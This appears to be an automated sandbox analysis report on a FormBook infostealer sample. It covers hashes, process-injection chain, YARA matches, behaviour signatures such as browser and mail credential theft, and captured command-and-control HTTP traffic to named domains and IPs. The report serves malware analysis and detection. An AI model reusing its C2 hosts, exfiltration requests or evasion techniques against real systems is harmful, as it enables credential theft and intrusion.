Windows Analysis Report
BMhDm7YW62.exe

Overview

General Information

Sample name: BMhDm7YW62.exe (renamed because original name is a hash value)
Original sample name: 3cc5b7aa1246d1f0bce5ffcabaa0525c40214012fc13998c711ac741ae71d4ce.exe
Analysis ID: 1355500
MD5: 67c64609c2542690d1d652d085a8f2bf
SHA1: 8017c9b1b9273f49bdc02e4b90de1cb767202c0b
SHA256: 3cc5b7aa1246d1f0bce5ffcabaa0525c40214012fc13998c711ac741ae71d4ce
Tags: exe

Detection

FormBook, NSISDropper
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected NSISDropper
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • BMhDm7YW62.exe (PID: 3464 cmdline: C:\Users\user\Desktop\BMhDm7YW62.exe MD5: 67C64609C2542690D1D652D085A8F2BF)
    • okawzsv.exe (PID: 6424 cmdline: "C:\Users\user\AppData\Local\Temp\okawzsv.exe" MD5: 7673BEFD936A20FA9EB874383DEEDBFF)
      • okawzsv.exe (PID: 5188 cmdline: C:\Users\user\AppData\Local\Temp\okawzsv.exe MD5: 7673BEFD936A20FA9EB874383DEEDBFF)
        • zIlFieNVyhhCXAVrseNWP.exe (PID: 2556 cmdline: "C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • typeperf.exe (PID: 7512 cmdline: C:\Windows\SysWOW64\typeperf.exe MD5: 93925D4F55465CFC73C4CDF7F8B1F375)
            • zIlFieNVyhhCXAVrseNWP.exe (PID: 2016 cmdline: "C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 7904 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x27990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13bdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x27990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13bdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
5.2.okawzsv.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.okawzsv.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ae33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17082:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
5.2.okawzsv.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.okawzsv.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a033:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16282:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

No Sigma rule has matched
No Snort rule has matched


            AV Detection

            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exe, ReversingLabs: Detection: 64%
            Source: BMhDm7YW62.exe, ReversingLabs: Detection: 54%
            Source: Yara match, File source: 5.2.okawzsv.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 5.2.okawzsv.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exe, Joe Sandbox ML: detected
            Source: BMhDm7YW62.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Binary string: firefox.pdbP source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000000.1350794169.0000000000BCE000.00000002.00000001.01000000.00000006.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000000.1483436758.0000000000BCE000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: typeperf.pdb source: okawzsv.exe, 00000005.00000002.1429982812.00000000005D8000.00000004.00000020.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000003.1817748290.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: okawzsv.exe, 00000002.00000003.1274910552.000000001CF60000.00000004.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000002.00000003.1278096689.000000001D140000.00000004.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000003.1348854988.0000000000883000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000003.1346736464.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000BCE000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1429101996.0000000002F6A000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1431661373.000000000311F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: okawzsv.exe, okawzsv.exe, 00000005.00000003.1348854988.0000000000883000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000003.1346736464.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000BCE000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, typeperf.exe, 0000000B.00000003.1429101996.0000000002F6A000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1431661373.000000000311F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\xampp\htdocs\cdf5e02cc6bc498bb3e1a68a897b97eb\Loader\Release\Loader.pdb source: BMhDm7YW62.exe, 00000000.00000002.1295073357.0000000002914000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp, okawzsv.exe, 00000002.00000000.1266849062.0000000000426000.00000002.00000001.01000000.00000004.sdmp, okawzsv.exe, 00000005.00000000.1273203469.0000000000426000.00000002.00000001.01000000.00000004.sdmp, typeperf.exe, 0000000B.00000002.3736723872.0000000003633000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3733581608.0000000002DC0000.00000004.00000020.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000000.1483909115.0000000002C73000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1663743072.00000000166C3000.00000004.80000000.00040000.00000000.sdmp, okawzsv.exe.0.dr
            Source: Binary string: typeperf.pdbGCTL source: okawzsv.exe, 00000005.00000002.1429982812.00000000005D8000.00000004.00000020.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000003.1817748290.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\BMhDm7YW62.exe, Code function: 0_2_00405E93 FindFirstFileA,FindClose, 0_2_00405E93
            Source: C:\Users\user\Desktop\BMhDm7YW62.exe, Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004054BD
            Source: C:\Users\user\Desktop\BMhDm7YW62.exe, Code function: 0_2_00402671 FindFirstFileA, 0_2_00402671
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exe, Code function: 2_2_00401570 FindFirstFileW,FindNextFileW,FindClose, 2_2_00401570
            Source: C:\Windows\SysWOW64\typeperf.exe, Code function: 11_2_0293C010 FindFirstFileW,FindNextFileW,FindClose, 11_2_0293C010
            Source: C:\Windows\SysWOW64\typeperf.exe, Code function: 4x nop then pop edi, 11_2_02931810
            Source: C:\Windows\SysWOW64\typeperf.exe, Code function: 4x nop then xor eax, eax, 11_2_029299A0
            Source: C:\Windows\SysWOW64\typeperf.exe, Code function: 4x nop then pop edi, 11_2_0292E0C7
            Source: Joe Sandbox View, IP Address: 162.240.81.18
            Source: Joe Sandbox View, IP Address: 207.244.126.150
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown, DNS traffic detected: queries for: www.ozzventures.shop
            Source: unknownHTTP traffic detected: POST /m858/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.fortunetravelsltd.comOrigin: http://www.fortunetravelsltd.comReferer: http://www.fortunetravelsltd.com/m858/Content-Length: 184Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+Data Raw: 79 52 56 3d 55 52 4f 52 55 4c 4f 6c 58 72 42 39 6a 44 74 37 6c 43 65 47 53 4e 67 31 77 31 6f 31 45 52 32 79 39 50 4a 46 4f 55 68 72 41 75 6c 71 69 71 37 71 70 51 4d 58 67 56 32 37 6d 69 31 44 32 61 7a 35 59 77 4b 57 64 66 4e 72 75 75 69 50 68 36 4a 42 35 4e 50 43 42 4d 51 77 50 31 65 76 6a 61 53 53 6a 73 42 32 6f 48 55 78 43 54 32 6a 36 4f 5a 4f 43 65 76 59 2b 77 62 78 2b 2b 47 66 47 69 59 2f 4c 64 46 77 48 45 5a 42 50 38 54 30 34 4b 4f 78 79 36 54 44 51 53 4b 45 38 6c 71 33 41 46 32 74 5a 79 57 5a 66 4a 48 6d 50 76 77 30 4f 68 58 4e 45 51 3d 3d Data Ascii: yRV=URORULOlXrB9jDt7lCeGSNg1w1o1ER2y9PJFOUhrAulqiq7qpQMXgV27mi1D2az5YwKWdfNruuiPh6JB5NPCBMQwP1evjaSSjsB2oHUxCT2j6OZOCevY+wbx++GfGiY/LdFwHEZBP8T04KOxy6TDQSKE8lq3AF2tZyWZfJHmPvw0OhXNEQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 07 Dec 2023 14:53:04 GMTserver: LiteSpeedreferrer-policy: no-referrer-when-downgradeData Raw: 37 66 37 0d 0a e0 9b 02 80 fc ad e5 7f bf 4e 36 2b 2a 56 b7 49 15 27 02 a2 51 ef d0 f3 f0 87 3d c2 51 a9 a0 58 80 19 de e0 ff 77 ef bf 68 1f f4 03 45 ac 2e 8f 86 ce dc b9 bf 55 4a ed d6 da cc d9 a7 a4 f6 66 d1 18 94 52 3d 1a 81 a7 31 0b 00 c6 86 38 73 0f 87 86 32 5e b2 4e 52 04 1c cd fb fe 75 4a b3 5b c4 f0 66 ea a6 8c 82 29 cd 0e 16 67 3b 2c dc ad 41 f2 ad b8 6c db cd 61 f5 d1 26 eb 17 48 7e f5 d1 ef 02 17 f8 df 7f 0e 64 0d 38 d8 c7 db c1 8f 1d 99 52 5a bb a2 f0 e3 7a 9e b1 58 62 46 86 fe 6a f3 62 e8 b3 bf ac 98 9f 5d 21 02 d5 79 eb 09 97 f4 76 f8 e5 87 37 34 23 1e 48 41 1c ff 7a 65 29 f0 df a0 41 b6 38 cc 96 06 68 0e 48 13 2d 6a c6 b7 c3 3c 48 b9 c6 7f 10 3f c7 9b 55 17 a3 e4 7f d8 cf 00 51 2b 87 6f 5c a2 57 49 36 39 7c ff 5b 8d 48 16 9f c8 71 78 fd 15 5f 66 8d e0 fc 85 fc f8 d7 bf ff fd df 9f 3f 90 ff fe fb cd ff 7f f8 fd 3f e4 f7 ff 7e bf 40 db 0d f7 bb dd ee 35 a6 a7 c3 f7 dd 9b fa fd 87 37 1b 7c 98 b3 98 ac be 3e dd fe 90 30 f8 30 13 bb ac 5b ea 3a 98 fd 07 58 9d d2 38 79 67 30 7c 24 6d da cd 87 f1 e5 8f f2 47 f9 e3 cb 77 56 ca 67 02 dc 1e e1 53 25 fa c2 db dd 9c 84 77 ec af 36 3d 1b 88 5d 01 80 67 4c f8 48 2a a0 ba 5f f4 e4 9a 75 96 0e b9 f3 b5 88 09 8a 8f 24 48 67 c9 83 ef 7d 8a f9 a4 b8 59 3e ab 07 d8 59 8d 08 6b 11 ac 8e f7 6e 27 2e 3f 49 4e 8a f7 fd ab b3 cb 95 04 74 6f b9 59 22 9c ea 00 5b 49 7a ca d7 2e f9 51 28 8a c1 87 b4 2d 98 82 ba a1 8b 2e 99 b3 f6 33 f9 87 68 8b 78 1e fc 92 d4 1d a3 9f f1 e6 e8 e2 f9 7e f6 61 24 98 8f 43 02 3b 5a ad 92 f5 4b 91 c8 d0 84 6a 26 cb 24 ee 8b fc 88 68 7e 04 ba 
3c b1 d3 f5 5f 59 0c 88 a6 38 c8 d2 e7 3b 3f c7 83 95 50 31 8b a7 d2 51 fc cd cf 6b 6a cf 90 65 9a f6 bb af 90 41 3f 65 b1 ad ce 2b 13 0b c1 04 2b 58 5b a4 74 5a 11 04 a3 53 24 f5 2d 1e 80 4e fc c3 bb fe bb dd 6e a5 91 cf f8 a3 0f c4 fe 3d f9 05 c9 bf 98 ec a2 c8 aa b6 7d 09 40 22 4b 5d 7a 83 75 75 08 c9 6f 7a 02 fd 88 46 fb 01 e3 db 81 37 ec c1 1b 26 fe c4 df a9 35 6d 01 8b ab d9 0e 12 cf b1 b7 59 7d 9e 5a 1f 38 4e 88 29 27 d6 bc e5 f7 f5 83 f7 33 44 af ad 72 d2 4d 13 a1 77 5e 5f 21 09 4f 00 3a c6 9c 04 ba 89 69 63 b5 91 03 c7 85 56 87 42 ff 04 b6 f5 05 a7 b1 85 b1 31 cd ef 79 81 38 f7 3d eb 18 bf ba 61 78 93 67 71 e6 32 f7 4e 7d be 09 23 e9 b2 dd 09 dd 6a ae 9c 9b 70 bc b2 0d 5a b7 4b 3b c2 0d 17 e3 43 54 b2 cf dd fb 30 1d 1e 34 16 05 6d f6 8d 82 6b 53 b1 2c c9 fc 14 52 94 7a fe 07 f0 ba 6a 2f b5 ac ab 8b ae 7f 67 d4 71 3e a2 6e 5d 58 12 35 05 e7 78 a3 f3 bd 72 70 4b 46 58 28 9a e8 38 fb 3c de fb be f7 e6 f9 11 e0 be 02 ec 58 4a 9f 04 b0 85 5a 1c 60 b7 67 87 74 24 63 6f e6 fd 32 ee db a1 9f 6a 81 de 6d 36 4e 30 06 f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 07 Dec 2023 14:53:09 GMTserver: LiteSpeedreferrer-policy: no-referrer-when-downgradeData Raw: 37 66 37 0d 0a e0 9b 02 80 fc ad e5 7f bf 4e 36 2b 2a 56 b7 49 15 27 02 a2 51 ef d0 f3 f0 87 3d c2 51 a9 a0 58 80 19 de e0 ff 77 ef bf 68 1f f4 03 45 ac 2e 8f 86 ce dc b9 bf 55 4a ed d6 da cc d9 a7 a4 f6 66 d1 18 94 52 3d 1a 81 a7 31 0b 00 c6 86 38 73 0f 87 86 32 5e b2 4e 52 04 1c cd fb fe 75 4a b3 5b c4 f0 66 ea a6 8c 82 29 cd 0e 16 67 3b 2c dc ad 41 f2 ad b8 6c db cd 61 f5 d1 26 eb 17 48 7e f5 d1 ef 02 17 f8 df 7f 0e 64 0d 38 d8 c7 db c1 8f 1d 99 52 5a bb a2 f0 e3 7a 9e b1 58 62 46 86 fe 6a f3 62 e8 b3 bf ac 98 9f 5d 21 02 d5 79 eb 09 97 f4 76 f8 e5 87 37 34 23 1e 48 41 1c ff 7a 65 29 f0 df a0 41 b6 38 cc 96 06 68 0e 48 13 2d 6a c6 b7 c3 3c 48 b9 c6 7f 10 3f c7 9b 55 17 a3 e4 7f d8 cf 00 51 2b 87 6f 5c a2 57 49 36 39 7c ff 5b 8d 48 16 9f c8 71 78 fd 15 5f 66 8d e0 fc 85 fc f8 d7 bf ff fd df 9f 3f 90 ff fe fb cd ff 7f f8 fd 3f e4 f7 ff 7e bf 40 db 0d f7 bb dd ee 35 a6 a7 c3 f7 dd 9b fa fd 87 37 1b 7c 98 b3 98 ac be 3e dd fe 90 30 f8 30 13 bb ac 5b ea 3a 98 fd 07 58 9d d2 38 79 67 30 7c 24 6d da cd 87 f1 e5 8f f2 47 f9 e3 cb 77 56 ca 67 02 dc 1e e1 53 25 fa c2 db dd 9c 84 77 ec af 36 3d 1b 88 5d 01 80 67 4c f8 48 2a a0 ba 5f f4 e4 9a 75 96 0e b9 f3 b5 88 09 8a 8f 24 48 67 c9 83 ef 7d 8a f9 a4 b8 59 3e ab 07 d8 59 8d 08 6b 11 ac 8e f7 6e 27 2e 3f 49 4e 8a f7 fd ab b3 cb 95 04 74 6f b9 59 22 9c ea 00 5b 49 7a ca d7 2e f9 51 28 8a c1 87 b4 2d 98 82 ba a1 8b 2e 99 b3 f6 33 f9 87 68 8b 78 1e fc 92 d4 1d a3 9f f1 e6 e8 e2 f9 7e f6 61 24 98 8f 43 02 3b 5a ad 92 f5 4b 91 c8 d0 84 6a 26 cb 24 ee 8b fc 88 68 7e 04 ba 
3c b1 d3 f5 5f 59 0c 88 a6 38 c8 d2 e7 3b 3f c7 83 95 50 31 8b a7 d2 51 fc cd cf 6b 6a cf 90 65 9a f6 bb af 90 41 3f 65 b1 ad ce 2b 13 0b c1 04 2b 58 5b a4 74 5a 11 04 a3 53 24 f5 2d 1e 80 4e fc c3 bb fe bb dd 6e a5 91 cf f8 a3 0f c4 fe 3d f9 05 c9 bf 98 ec a2 c8 aa b6 7d 09 40 22 4b 5d 7a 83 75 75 08 c9 6f 7a 02 fd 88 46 fb 01 e3 db 81 37 ec c1 1b 26 fe c4 df a9 35 6d 01 8b ab d9 0e 12 cf b1 b7 59 7d 9e 5a 1f 38 4e 88 29 27 d6 bc e5 f7 f5 83 f7 33 44 af ad 72 d2 4d 13 a1 77 5e 5f 21 09 4f 00 3a c6 9c 04 ba 89 69 63 b5 91 03 c7 85 56 87 42 ff 04 b6 f5 05 a7 b1 85 b1 31 cd ef 79 81 38 f7 3d eb 18 bf ba 61 78 93 67 71 e6 32 f7 4e 7d be 09 23 e9 b2 dd 09 dd 6a ae 9c 9b 70 bc b2 0d 5a b7 4b 3b c2 0d 17 e3 43 54 b2 cf dd fb 30 1d 1e 34 16 05 6d f6 8d 82 6b 53 b1 2c c9 fc 14 52 94 7a fe 07 f0 ba 6a 2f b5 ac ab 8b ae 7f 67 d4 71 3e a2 6e 5d 58 12 35 05 e7 78 a3 f3 bd 72 70 4b 46 58 28 9a e8 38 fb 3c de fb be f7 e6 f9 11 e0 be 02 ec 58 4a 9f 04 b0 85 5a 1c 60 b7 67 87 74 24 63 6f e6 fd 32 ee db a1 9f 6a 81 de 6d 36 4e 30 06 f
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close content-type: text/html; charset=UTF-8 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Thu, 07 Dec 2023 14:53:10 GMT server: LiteSpeed referrer-policy: no-referrer-when-downgrade
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Dec 2023 14:53:19 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Ascii: 3b<!DOCTYPE html><html lang="en-US"><head><meta charset="
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Dec 2023 14:53:22 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Ascii: 16<!DOCTYPE html><html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Dec 2023 14:53:25 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Ascii: 3b<!DOCTYPE html><html lang="en-US"><head><meta charset="
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Dec 2023 14:53:35 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Dec 2023 14:53:38 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Dec 2023 14:53:41 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Dec 2023 14:53:43 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 07 Dec 2023 14:53:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 07 Dec 2023 14:53:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 07 Dec 2023 14:53:55 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 07 Dec 2023 14:53:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://sorenad.com/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Thu, 07 Dec 2023 14:54:14 GMT server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://sorenad.com/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Thu, 07 Dec 2023 14:54:17 GMT server: LiteSpeed
